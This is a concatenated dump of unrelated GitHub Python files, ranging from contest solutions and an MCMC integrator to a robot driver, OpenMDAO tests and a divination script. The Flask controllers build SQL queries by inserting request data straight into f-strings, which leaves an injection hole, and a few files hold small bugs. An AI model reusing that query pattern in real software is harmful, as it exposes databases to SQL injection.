= SPOJ_CNT_AC[name]\n point = 200 / (100 + int(cnt_AC) + spoj_cnt)\n problem_points[problem_name] = point\n return problem_points","repo_name":"leduythuccs/VOJ-ranking-bot","sub_path":"helper/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27185318860","text":"S = input()\nl = len(S)\nans = 100000000\ncount = 1\nfor i in range(l-1):\n\tif S[i+1] != S[i]:\n\t\ttmp = max([i+1,l-i-1])\n\t\tans = min([ans,tmp])\n\nif ans == 100000000:\n\tans = l\nprint(ans)\n\n","repo_name":"banboooo044/AtCoder","sub_path":"ABC083/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22981198565","text":"from collections import namedtuple\nfrom typing import Callable, Tuple\n\nimport numpy as np\nfrom scipy import linalg\nfrom .quadpotential import QuadPotential\n\n\nState = namedtuple(\"State\", \"q, p, v, q_grad, energy, model_logp\")\n\n\nclass IntegrationError(RuntimeError):\n \"\"\"Numerical errors during leapfrog integration.\"\"\"\n\n pass\n\n\nclass CpuLeapfrogIntegrator(object):\n \"\"\"Leapfrog integrator using the CPU.\"\"\"\n\n def __init__(\n self,\n potential: QuadPotential,\n logp_dlogp_func: Callable[[np.ndarray], Tuple[np.ndarray, np.ndarray]],\n ) -> None:\n \"\"\"Instantiate a CPU leapfrog integrator.\n\n Parameters\n ----------\n potential\n logp_dlogp_func\n \"\"\"\n self._potential = potential\n self._logp_dlogp_func = logp_dlogp_func\n\n def compute_state(self, q: np.ndarray, p: np.ndarray) -> State:\n \"\"\"Compute Hamiltonian functions using a position and momentum.\n\n Parameters\n ----------\n q\n Position.\n p\n Momentum\n \"\"\"\n logp, dlogp = self._logp_dlogp_func(q)\n v = self._potential.velocity(p)\n kinetic = self._potential.energy(p, velocity=v)\n energy = kinetic - logp\n return State(q, p, v, dlogp, energy, logp)\n\n def step(self, epsilon, state: State, out=None):\n \"\"\"Leapfrog integrator step.\n\n Half a momentum update, full position update, half momentum update.\n\n Parameters\n ----------\n epsilon: float, > 0\n step scale\n state: State namedtuple,\n current position data\n out: (optional) State namedtuple,\n preallocated arrays to write to in place\n\n Returns\n -------\n None if `out` is provided, else a State namedtuple\n \"\"\"\n try:\n return self._step(epsilon, state)\n except linalg.LinAlgError as err:\n msg = \"LinAlgError during leapfrog step.\"\n raise IntegrationError(msg)\n except ValueError as err:\n # Raised by many scipy.linalg functions\n scipy_msg = \"array must not contain infs or nans\"\n if len(err.args) > 0 and scipy_msg in err.args[0].lower():\n msg = \"Infs or nans in scipy.linalg during leapfrog step.\"\n raise IntegrationError(msg)\n else:\n raise\n\n def _step(self, epsilon, state: State) -> State:\n \"\"\"Perform one leapfrog step.\"\"\"\n pot = self._potential\n q, p, v, q_grad, energy, logp = state\n\n dt = 0.5 * epsilon\n\n # Half momentum step\n p_new = p + dt * q_grad\n\n # Whole position step\n v_new = pot.velocity(p_new)\n q_new = (q + epsilon * v_new).astype(q.dtype)\n\n # Half momentum step\n logp, q_new_grad = self._logp_dlogp_func(q_new)\n p_new = p_new + dt * q_new_grad\n\n kinetic = pot.velocity_energy(p_new, v_new)\n energy = kinetic - logp\n\n return State(q_new, p_new, v_new, q_new_grad, energy, logp)\n","repo_name":"eigenfoo/littlemcmc","sub_path":"littlemcmc/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"53"} +{"seq_id":"28894569137","text":"#!/bin/python3\nimport os, glob\nfrom latex import build_pdf, LatexBuildError\nfrom .watcher import Watcher\n\n\ndef compile_tex(tex_filename, printLog=True):\n base_filename = tex_filename.split('.tex')[0]\n pdf_filename = '{}{}'.format(base_filename, '.pdf')\n\n current_dir = os.path.abspath(os.path.dirname(__file__))\n\n with open(tex_filename) as tex_file:\n try:\n pdf = build_pdf(tex_file, texinputs=[current_dir, ''])\n pdf.save_to(pdf_filename)\n if printLog:\n print('compiling {} to {}'.format(tex_filename, pdf_filename))\n\n except LatexBuildError as e:\n for err in e.get_errors():\n print(u'Error in {0[filename]}, line {0[line]}: {0[error]}'.format(err))\n # also print one line of context\n print(u' {}\\n'.format(err['context'][1]))\n\n\ndef compile_tex_watcher_callback(event_type, file_path):\n if '.tex' in file_path:\n compile_tex(file_path)\n\n\ndef main():\n print('Watching for changes to any .tex file the local directory')\n Watcher(compile_tex_watcher_callback).run()\n","repo_name":"JoshuaNeely/python-latex","sub_path":"python_latex/compile_tex.py","file_name":"compile_tex.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36520503936","text":"# very good for creating lists easily\n# and also help in reading, modifying lists, generators etc.\n\nnums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nmy_list = [n for n in nums]\nprint(my_list)\n\n# let's complicate\n\nsq_list = [n**2 for n in nums]\nprint(sq_list)\n\n# or you can use map with lambda in the following way, but more complicated.\nsq_list_map = map(lambda n: n**2, nums)\nprint(list(sq_list_map))\n\n# even more complication?\nif_even = [n for n in nums if n%2 == 0]\nprint(if_even)\n\n# can also use filter/map and lambda for this as well.\nif_even_map = filter(lambda n: n%2 == 0, nums)\nprint(list(if_even_map))\n\n\n# More complications? Make a letter number pair, for each letter in ABCD paired to each number.\nalphas = 'ABCD'\npairing = [(letter, num) for letter in alphas for num in nums]\nprint(pairing)\n\n# EvEN MORE? How about some superhero stuff zipping through the city? IN A DICTIONARY??\n\nnames = ['Bruce', 'Clark', 'Peter', 'Thor', 'Logan', 'Wade']\nheroes = ['Batman', 'Superman', 'Spiderman', 'Odinson', 'Wolverine', 'Deadpool']\n\nsuper_power = {name:hero for name, hero in zip(names, heroes) if name != 'Peter'}\nprint(super_power)\n\n\n# HOW ABOUT SET COMPREHENSIONS? You don't even know what SET is!!\n# SET --> A set is like a list but it has all unique values.\n\nnumss = [1, 1, 2, 3, 3, 4, 4, 5, 6, 6, 7, 7, 8, 8, 8, 9, 10]\n\n# Normal way of doing things.\n\n# my_set = set()\n# for n in numss:\n# my_set.add(n)\n# print(my_set)\n\n# Comprehension way is much much simpler!!\n\nmy_set = {n for n in numss}\nprint(m_set)\n\n","repo_name":"ameerhkhan/Python-Practice-Exercises","sub_path":"comprehensions/list_comprehensions.py","file_name":"list_comprehensions.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70847011688","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2020-08-01 11:28:48\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n\nimport os,sys\nimport touchSocket\nimport time\n\ndef test1():\n # x = '06ff'\n # x = x[::-1]\n # print(x)\n a = 1000\n b= str(hex(a))\n print(b)\n\ndef test():\n # a= {'a':1,'b':2}\n # print(a.a)\n client = touchSocket.ClientSocket('192.168.0.193')\n time.sleep(1)\n client.send('!')\n x = '[06ff]'\n print(x)\n client.send(x)\n client.send('1')\n while True:\n client.send('1')\n time.sleep(10)\n\nimport tkinter as tk\nfrom PIL import Image, ImageTk\n\nclass App(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master, width=400, height=300)\n self.pack()\n self.pilImage = Image.open(\"images/IMG_1614.jpg\")\n w,h = self.pilImage.size\n w = int(w*0.3)\n h = int(h*0.3)\n self.pilImage = self.pilImage.resize((w,h),Image.ANTIALIAS)\n self.tkImage = ImageTk.PhotoImage(image=self.pilImage)\n self.label = tk.Label(self, image=self.tkImage)\n self.label.pack()\n self.imageIndex = 0\n\n def resizeImg(self,pilimg):\n w,h = pilimg.size\n w = int(w*0.3)\n h = int(h*0.3)\n rimg = pilimg.resize((w,h),Image.ANTIALIAS)\n return rimg\n\n def processEvent(self):\n tmpimgpth = ''\n self.imageIndex += 1\n if self.imageIndex == 0:\n tmpimgpth = 'images/IMG_1614.jpg'\n elif self.imageIndex == 1:\n tmpimgpth = 'images/IMG_1615.jpg'\n else:\n tmpimgpth = 'images/IMG_1616.jpg'\n self.imageIndex = -1\n self.pilImage = Image.open(tmpimgpth)\n self.pilImage = self.resizeImg(self.pilImage)\n self.tkImage = ImageTk.PhotoImage(image=self.pilImage)\n self.label.configure(image=self.tkImage)\n self.label.image = self.tkImage\n self.label.update()\n print('xxx')\n def onFrame(self):\n self.processEvent()\n self.after(1000,self.onFrame)\n \ndef test2():\n #encoding=utf-8\n root = tk.Tk()\n app = App(root)\n root.geometry(\"+600+0\")\n app.after(1000,app.onFrame)\n\n root.mainloop()\ndef test3():\n a= 'a/b/c.png'\n x = os.path.splitext(a)\n print(x)\n#测试\nif __name__ == '__main__':\n test3()\n # test1()","repo_name":"fengmm521/yolov3_showDemo","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"984788865","text":"import RPi.GPIO as GPIO\nfrom Hardware_Controllers.Motor import PWM\nfrom Control_Programs.line_tracker import LineTracker\nfrom Hardware_Controllers.servo import Servo\n\n# For command-line arguments\nimport sys\n# For debugging, to print the entire exception when errors occur, but also handle it gracefully\nfrom traceback import print_exc\n\nfrom Misc_Code.commons import clamp, NodeType, Timer, Tracking, DriveInstructions, speed_state_dict, acc_state_dict\nfrom Hardware_Controllers.parse_UART import UARTCommunication\n\n\nclass ActiveConnectivityAccelerationLineDriver:\n def __init__(self, inverse_IR: bool, node_type: NodeType):\n self.inverse_IR = inverse_IR\n self.tracker = LineTracker(inverse_IR)\n\n self.node_type = node_type\n port_name = \"/dev/ttyACM0\"\n self.launchpad_comm = UARTCommunication(port_name)\n if self.node_type == NodeType.Coordinator:\n self.launchpad_comm.set_coordinator()\n\n def ac_line_driving_2(self):\n \"\"\"\n This implementation of Active Connectivity modifies\n the acceleration of the robots depending on the connection strength.\n \"\"\"\n current_acc = 0\n acc_update_period = 0.5\n acc_timer = Timer(acc_update_period)\n min_speed = speed_state_dict[DriveInstructions.SLOWER]\n max_speed = speed_state_dict[DriveInstructions.FASTER]\n current_speed = 0\n\n # ------ communication ------\n read_period = 4 # A message is sent every 5 seconds. We see if there's a new one every 9 seconds.\n read_timer = Timer(read_period)\n # Wait until a DriveInstruction is received,\n # which indicates that a connection between node and coordinator has been formed\n self.launchpad_comm.start_async()\n instruction = DriveInstructions.NONE # DriveInstructions.NONE\n while instruction == DriveInstructions.NONE:\n if read_timer.check():\n print(\"checking latest message\")\n instruction = self.launchpad_comm.recent_instruction\n if instruction != DriveInstructions.NONE:\n current_acc = acc_state_dict[instruction]\n\n current_speed = speed_state_dict[DriveInstructions.BASE]\n debug_i = 0\n while True:\n debug_i += 1\n\n # ------ communication ------\n if self.node_type == NodeType.Child:\n if read_timer.check():\n instruction = self.launchpad_comm.recent_instruction\n if instruction != DriveInstructions.NONE:\n current_acc = acc_state_dict[instruction]\n\n # ------ alignment ------\n alignment = self.tracker.get_alignment()\n\n # ------ fundamental driving ------\n if acc_timer.check(): # If we should update the speed by acceleration amount.\n current_speed += current_acc\n # Clamp it, so that we don't start to reverse, or go too fast for the line tracking to work.\n current_speed = clamp(current_speed, min_speed, max_speed)\n\n if alignment == Tracking.FORWARD.value:\n # If we are driving forwards, we can use the current speed.\n motor_values = [current_speed] * 4\n else:\n # Else, if we should turn to stay on the line.\n motor_values = alignment\n PWM.set_motor_model_by_iterable(motor_values)\n\n # ------ debugging ------\n if debug_i % 100 == 0:\n print(\"----\")\n print(\"current speed:{}\".format(current_speed))\n print(\"current acceleration:{}\".format(current_acc))\n print(\"fwd_motor_values:{}\".format(*motor_values))\n\n\nif __name__ == '__main__':\n print('Program is starting ... ')\n\n try:\n sysargs = [arg.strip().lower() for arg in sys.argv]\n if \"child\" in sysargs:\n arg_nodetype = NodeType.Child\n else:\n arg_nodetype = NodeType.Coordinator\n if \"inverse\" in sysargs:\n arg_inverse = True\n else:\n arg_inverse = False\n\n print((\".\" * 10 + \"\\nStarting driver. IR inverse: {}\\n{}\\n\" + \".\" * 10).\n format(arg_inverse, arg_nodetype))\n driver = ActiveConnectivityAccelerationLineDriver(arg_inverse, arg_nodetype)\n driver.ac_line_driving_2()\n except KeyboardInterrupt: # Exception as e: # When 'Ctrl+C' is pressed, the child program will be executed.\n print(\"program was terminated.\")\n finally:\n print_exc()\n PWM.set_motor_model(0, 0, 0, 0)\n Servo().setServoPwm('0', 90)\n Servo().setServoPwm('1', 90)\n driver.launchpad_comm.finish_async()\n driver.launchpad_comm.reboot_launchpad()\n","repo_name":"Project-Repositories/BSC_Proj_IoRT","sub_path":"Robot Controller code/Demos/demo_4_acceleration.py","file_name":"demo_4_acceleration.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71523385448","text":"from app.database.connection import get_db\nfrom flask import jsonify, abort\n\n\ndef index():\n cur = get_db().cursor()\n cur.execute(\"SELECT * FROM types\")\n types = cur.fetchall()\n cur.close()\n\n return jsonify(types)\n\n\ndef create(data):\n type_name = data['name']\n\n cur = get_db().cursor()\n try:\n cur.execute(f\"INSERT INTO types(name) VALUES('{type_name}')\")\n get_db().commit()\n cur.close()\n except:\n cur.close()\n abort(400)\n\n return jsonify({'result': True}), 201\n\n\ndef delete(type_id):\n cur = get_db().cursor()\n\n cur.execute(f\"SELECT * FROM types WHERE id={type_id}\")\n type_obj = cur.fetchone()\n if type_obj is None:\n abort(400)\n\n cur.execute(f\"DELETE FROM types WHERE id={type_id}\")\n get_db().commit()\n cur.close()\n\n return jsonify({'result': True})\n\n\ndef list_photo():\n cur = get_db().cursor()\n cur.execute(\"SELECT * FROM types\")\n types = cur.fetchall()\n\n data = []\n for identifier in types:\n ty = identifier['id']\n cur.execute(f\"SELECT photo FROM photo_info pi NATURAL JOIN photo_most pm WHERE type={ty}\")\n identifier['photo'] = cur.fetchone()['photo']\n data.append(identifier)\n\n cur.close()\n\n return jsonify(data)\n","repo_name":"ARJOM/Awards","sub_path":"backend/app/controllers/types_controllers.py","file_name":"types_controllers.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6203778914","text":"#!./usr/bin/env.python\n# .-*- coding: utf-8 -*-\n# ._author_.=.\"Max丶\"\n# ._Email:_.=.\"max@chamd5.org\"\nimport time\nfrom prettytable import PrettyTable\nimport tabulate\nfrom borax.calendars.lunardate import LunarDate\nfrom QuXiang.QuXiang import *\n\n\n\ndef ShiChen():\n print(time.strftime(\"现在阳历时间为:%Y-%m-%d %H:%M\\n\", time.localtime()))\n Year = int(time.strftime(\"%Y\", time.localtime()))\n Month = int(time.strftime(\"%m\", time.localtime()))\n Day = int(time.strftime(\"%d\", time.localtime()))\n # 转换 农历年月日\n lunar_date = LunarDate.from_solar_date(Year, Month, Day)\n month = lunar_date.month\n day = lunar_date.day\n print(lunar_date.strftime('%G'))\n print('农历时间:', month, '月',day,'日','\\n')\n print('以下是时辰对应的数字:')\n print('子时 23:00-01:00:1 ')\n print('丑时 01:00-03:00:2 ')\n print('寅时 03:00-05:00:3 ')\n print('卯时 05:00-07:00:4 ')\n print('辰时 07:00-09:00:5 ')\n print('巳时 09:00-11:00:6 ')\n print('午时 11:00-13:00:7 ')\n print('未时 13:00-15:00:8 ')\n print('申时 15:00-17:00:9 ')\n print('酉时 17:00-19:00:10')\n print('戌时 19:00-21:00:11')\n print('亥时 21:00-23:00:12','\\n')\n\ndef YunSuan():\n #六神定义\n dict_list = ['大安☯(木)','留连☯(土)','速喜☯(火)','赤口☯(金)','小吉☯(水)','空亡☯(土)']\n dict_key = ['大安','留连','速喜','赤口','小吉','空亡']\n dict ={\"大安\":Daan,'留连':LiuLian,'速喜':SuXi,'赤口':ChiKou,'小吉':XiaoJi,'空亡':KongWang}\n s_month = int(input(\"请输入月/随机数:\"))\n s_day = int(input(\"请输入日/随机数:\"))\n s_hour = int(input(\"请输入时辰:\"))\n # s_month = 5\n # s_day = 4\n # s_hour = 8\n dict_shichen = ['子时(水)','丑时(土)','寅时(木)','卯时(木)','辰时(土)','巳时(火)','午时(火)','未时(土)','申时(金)','酉时(金)','戌时(土)','亥时(水)']\n\n # 运算 推算日月时辰对应的数字\n sum = s_month + s_day - 1\n today_i = int((sum - 1) % 6)\n month_i = int((s_month - 1) % 6)\n hour = s_month + s_day + s_hour\n hour_i =int((hour - 3) % 6)\n hour_s = hour_i - 1\n\n #运算 年月时辰对应的 六神三宫\n today_f = dict_list[today_i]\n month_f = dict_list[month_i]\n hour_f = dict_list[hour_i]\n shichen_f = dict_shichen[hour_s]\n table = PrettyTable(['☯天 时☯','☯地 利☯','☯人 和☯','☯用 神☯'])\n table.title = '☯三宫☯☯所属☯'\n table.add_row(['☯'+month_f+'☯','☯'+today_f+'☯','☯'+hour_f+'☯','☯'+shichen_f+'☯'])\n table.add_row(['☯起 因☯','☯经 过☯','☯现 在☯','☯未 来☯'])\n print(table)\n today_o = dict[dict_key[today_i]]()\n month_o = dict[dict_key[month_i]]()\n hour_o = dict[dict_key[hour_i]]()\n print('\\n\\n'+month_o+'\\n\\n',today_o+'\\n\\n',hour_o+'\\n\\n')\n print(HeGong()+'\\n\\n')\n print(table)\n\n\n\n\n\nif __name__ == '__main__':\n while True: #死循环 每一天运行一次配置\n ShiChen()\n YunSuan()\n time.sleep(86400)\n\n\n\n","repo_name":"MaxSecurity/Xiao6Ren","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"39233449527","text":"\nfrom math import log10\nfrom time import time\n\n\ndef main():\n Ln, n, a, b = 1000, 3, 2, 0\n for i in range(2, Ln+1):\n n, a = n + 2*a, n + a\n if int(log10(n)) > int(log10(a)): b += 1\n return b\n\n\nif __name__ == \"__main__\":\n start = time()\n print(\"Answer:{}\".format(main()))\n print(\"Time Taken : {}\".format(time() - start))\n \n","repo_name":"fermihacker/ProjectEuler100","sub_path":"Problem057.py","file_name":"Problem057.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9342148010","text":"import unittest\n\nimport numpy as np\nimport openmdao.api as om\nfrom openmdao.utils.assert_utils import assert_near_equal, assert_check_totals\n\nstep = 1e-6\nsize = 3\n\nclass Mult(om.ExplicitComponent):\n\n def setup(self):\n\n self.add_input('x', np.ones(size))\n self.add_input('y', np.ones(size))\n\n self.add_output('z', np.ones(size))\n\n self.declare_partials(of='*', wrt='*')\n\n def compute(self, inputs, outputs):\n\n outputs['z'] = inputs['x'] * inputs['y']\n\n def compute_partials(self, inputs, partials):\n\n partials['z', 'x'] = inputs['y']\n partials['z', 'y'] = inputs['x']\n\n\nclass GeometryAndAero(om.Group):\n\n def setup(self):\n\n self.add_subsystem(\"comp1\", Mult(), promotes_inputs=['y'])\n self.add_subsystem(\"comp2\", Mult(), promotes_inputs=['y'])\n self.add_subsystem(\"comp3\", Mult(), promotes_inputs=['y'])\n\n # self.connect('comp1.z', 'comp2.x')\n self.connect('comp2.z', 'comp3.x')\n\n if self.method == 'fd':\n self.approx_totals(step=step, step_calc=\"abs\", method=self.method, form=\"forward\")\n else:\n self.approx_totals(method=self.method)\n\n\nclass TestSemiTotals(unittest.TestCase):\n\n def test_semi_totals_fd(self):\n prob = om.Problem()\n\n sub = prob.model.add_subsystem('sub', GeometryAndAero(), promotes=['*'])\n sub.method = 'fd'\n\n prob.model.add_design_var(\"y\")\n prob.model.add_objective(\"comp3.z\", index=0)\n\n prob.setup(force_alloc_complex=True, check=False)\n prob.set_val(\"y\", 5.0 * np.ones(size))\n\n prob.run_model()\n\n # Deriv should be 75. Analytic was wrong before the fix.\n data = prob.check_totals(method=\"fd\", form=\"forward\", step=step, step_calc=\"abs\", out_stream=None)\n assert_check_totals(data, atol=1e-5, rtol=1e-6)\n\n def test_semi_totals_cs(self):\n prob = om.Problem()\n\n sub = prob.model.add_subsystem('sub', GeometryAndAero(), promotes=['*'])\n sub.method = 'cs'\n\n prob.model.add_design_var(\"y\")\n prob.model.add_objective(\"comp3.z\", index=0)\n\n prob.setup(force_alloc_complex=True, check=False)\n prob.set_val(\"y\", 5.0 * np.ones(size))\n\n prob.run_model()\n\n # Deriv should be 75. Analytic was wrong before the fix.\n data = prob.check_totals(method=\"cs\", out_stream=None)\n\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n def test_semi_totals_cs_indirect(self):\n prob = om.Problem()\n\n prob.model.add_subsystem('indeps', om.IndepVarComp('yy', np.ones(size)))\n prob.model.add_subsystem('comp', om.ExecComp('z=2*y', z=np.ones(size), y=np.ones(size)))\n sub = prob.model.add_subsystem('sub', GeometryAndAero(), promotes=['*'])\n sub.method = 'cs'\n\n prob.model.connect('indeps.yy', 'comp.y')\n prob.model.connect('comp.z', 'y')\n prob.model.add_design_var(\"indeps.yy\")\n prob.model.add_objective(\"comp3.z\", index=0)\n\n prob.setup(force_alloc_complex=True, check=False)\n prob.set_val(\"y\", 5.0 * np.ones(size))\n\n prob.run_model()\n\n # Deriv should be 75. Analytic was wrong before the fix.\n data = prob.check_totals(method=\"cs\", out_stream=None)\n\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n def test_multi_conn_inputs_manual_connect(self):\n\n prob = om.Problem()\n prob.model.add_subsystem('px1', om.IndepVarComp('x', 1.0))\n sub1 = prob.model.add_subsystem('sub1', om.Group())\n sub2 = prob.model.add_subsystem('sub2', om.Group())\n\n sub1.add_subsystem('src', om.ExecComp('y=x'))\n sub2.add_subsystem('comp1', om.ExecComp('z=x+y'))\n sub2.add_subsystem('comp2', om.ExecComp('z=x+y'))\n sub2.add_subsystem('comp3', om.ExecComp('z=x+y'))\n\n prob.model.connect('px1.x', 'sub1.src.x')\n prob.model.connect('sub1.src.y', 'sub2.comp1.y')\n prob.model.connect('sub1.src.y', 'sub2.comp2.y')\n prob.model.connect('sub1.src.y', 'sub2.comp3.y')\n\n sub2.approx_totals(method='cs')\n\n wrt = ['px1.x']\n of = ['sub2.comp1.z', 'sub2.comp2.z', 'sub2.comp3.z']\n\n prob.setup(mode='fwd')\n prob.run_model()\n\n assert_near_equal(prob['sub1.src.y'], 1.0, 1e-6)\n assert_near_equal(prob['sub2.comp1.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp2.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp3.z'], 2.0, 1e-6)\n\n data = prob.check_totals(of=of, wrt=wrt, method=\"fd\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n # Check the total derivatives in reverse mode\n prob.setup(mode='rev')\n prob.run_model()\n\n assert_near_equal(prob['sub1.src.y'], 1.0, 1e-6)\n assert_near_equal(prob['sub2.comp1.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp2.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp3.z'], 2.0, 1e-6)\n\n data = prob.check_totals(of=of, wrt=wrt, method=\"fd\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n def test_multi_conn_inputs_promoted(self):\n\n prob = om.Problem()\n prob.model.add_subsystem('px1', om.IndepVarComp('x', 1.0))\n sub1 = prob.model.add_subsystem('sub1', om.Group(), promotes=['y'])\n sub2 = prob.model.add_subsystem('sub2', om.Group(), promotes=['y'])\n\n sub1.add_subsystem('src', om.ExecComp('y=x'), promotes=['y'])\n sub2.add_subsystem('comp1', om.ExecComp('z=x+y'), promotes_inputs=['y'])\n sub2.add_subsystem('comp2', om.ExecComp('z=x+y'), promotes_inputs=['y'])\n sub2.add_subsystem('comp3', om.ExecComp('z=x+y'), promotes_inputs=['y'])\n\n prob.model.connect('px1.x', 'sub1.src.x')\n\n sub2.approx_totals(method='cs')\n\n wrt = ['px1.x']\n of = ['sub2.comp1.z', 'sub2.comp2.z', 'sub2.comp3.z']\n\n prob.setup(mode='fwd')\n prob.run_model()\n\n assert_near_equal(prob['y'], 1.0, 1e-6)\n assert_near_equal(prob['sub2.comp1.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp2.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp3.z'], 2.0, 1e-6)\n\n data = prob.check_totals(of=of, wrt=wrt, method=\"fd\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n # Check the total derivatives in reverse mode\n prob.setup(mode='rev')\n prob.run_model()\n\n assert_near_equal(prob['y'], 1.0, 1e-6)\n assert_near_equal(prob['sub2.comp1.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp2.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp3.z'], 2.0, 1e-6)\n\n data = prob.check_totals(of=of, wrt=wrt, method=\"fd\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n\nclass FakeGeomComp(om.ExplicitComponent):\n\n def initialize(self):\n self.options.declare(\"n\", types=int)\n\n def setup(self):\n n = self.options[\"n\"]\n self.add_input(\"x0\", val=np.zeros(n), units=\"m\")\n self.add_input(\"feather\", val=0.0, units=\"deg\")\n self.add_output(\"x\", val=np.zeros(n), units=\"m\")\n\n self.declare_partials(\"*\", \"*\", method=\"fd\")\n\n self._counter = 0\n\n def compute(self, inputs, outputs):\n self._counter += 1\n feather_rad = inputs[\"feather\"][0]*np.pi/180\n x0 = inputs[\"x0\"]\n\n outputs[\"x\"][:] = 3*np.sin(feather_rad + 0.2)*x0 + 3*feather_rad**2\n\n\nclass FakeAeroComp(om.ExplicitComponent):\n\n def initialize(self):\n self.options.declare(\"n\", types=int)\n\n def setup(self):\n n = self.options[\"n\"]\n\n self.add_input(\"x\", val=np.arange(n), units=\"m\")\n self.add_input(\"omega\", val=7000*2*np.pi/60, units=\"rad/s\")\n\n self.add_output(\"CT\", val=0.5)\n self.add_output(\"CP\", val=0.5)\n\n self.declare_partials(\"*\", \"*\", method=\"fd\")\n\n self._counter = 0\n\n def compute(self, inputs, outputs):\n self._counter += 1\n omega = inputs[\"omega\"][0]\n x = inputs[\"x\"]\n\n outputs[\"CT\"][0] = 0.8*omega**2 + np.sum(x)\n outputs[\"CP\"][0] = 0.1*omega**3 + np.sum(x**2)\n\n\nclass GeometryAndAero2(om.Group):\n\n def initialize(self):\n self.options.declare(\"n\", types=int)\n self.options.declare(\"rho\", types=float)\n self.options.declare(\"vinf\", types=float)\n\n def setup(self):\n n = self.options[\"n\"]\n\n comp = self.add_subsystem(\"init_geom\", om.IndepVarComp(), promotes_outputs=[\"x0\"])\n comp.add_output(\"x0\", val=np.arange(n) + 1.0, units=\"m\")\n\n self.add_subsystem(\"geom\", FakeGeomComp(n=n), promotes_inputs=[\"x0\", \"feather\"], promotes_outputs=[\"x\"])\n self.add_subsystem(\"aero\", FakeAeroComp(n=n), promotes_inputs=[\"x\", \"omega\"], promotes_outputs=[\"CT\", \"CP\"])\n\n def reset_count(self):\n self.geom._counter = 0\n self.aero._counter = 0\n\n\nclass TestSemiTotalsNumCalls(unittest.TestCase):\n\n def test_call_counts(self):\n size = 10\n rho = 1.17573\n minf = 0.111078231621482\n speedofsound = 344.5760217432\n vinf = minf*speedofsound\n\n prob = om.Problem()\n\n omega = 7199.759242*2*np.pi/60\n ivc = prob.model.add_subsystem(\"ivc\", om.IndepVarComp(), promotes_outputs=[\"*\"])\n ivc.add_output(\"feather\", val=0.0, units=\"deg\")\n ivc.add_output(\"omega\", val=omega, units=\"rad/s\")\n\n geom_and_aero = prob.model.add_subsystem('geom_and_aero',\n GeometryAndAero2(n=size, rho=rho, vinf=vinf),\n promotes_inputs=[\"feather\", \"omega\"],\n promotes_outputs=[\"CT\", \"CP\"])\n geom_and_aero.approx_totals(step=step, step_calc=\"abs\", method=\"fd\", form=\"forward\")\n\n prob.model.add_design_var(\"feather\", lower=-5.0, upper=25.0, units=\"deg\", ref=1.0)\n prob.model.add_design_var(\"omega\", lower=3000*2*np.pi/60, upper=7500*2*np.pi/60, units=\"rad/s\", ref=1.0)\n prob.model.add_objective(\"CP\", ref=1e0)\n\n prob.setup(force_alloc_complex=False)\n\n omega = (6245.096992023524*2*np.pi/60) + step\n feather = 0.6362159381168669\n prob.set_val(\"omega\", omega, units=\"rad/s\")\n prob.set_val(\"feather\", feather, units=\"deg\")\n prob.run_model()\n geom_and_aero.reset_count()\n prob.compute_totals(of=[\"CT\"], wrt=[\"feather\", \"omega\"])\n\n self.assertEqual(geom_and_aero.geom._counter, 2)\n self.assertEqual(geom_and_aero.aero._counter, 2)\n\n geom_and_aero.reset_count()\n data = prob.check_totals(method=\"fd\", form=\"forward\", step=step, step_calc=\"abs\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n self.assertEqual(geom_and_aero.geom._counter, 4)\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/core/tests/test_semitotals.py","file_name":"test_semitotals.py","file_ext":"py","file_size_in_byte":10713,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"} +{"seq_id":"23286992444","text":"import sys\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Activation, Dropout\nfrom sklearn.model_selection import 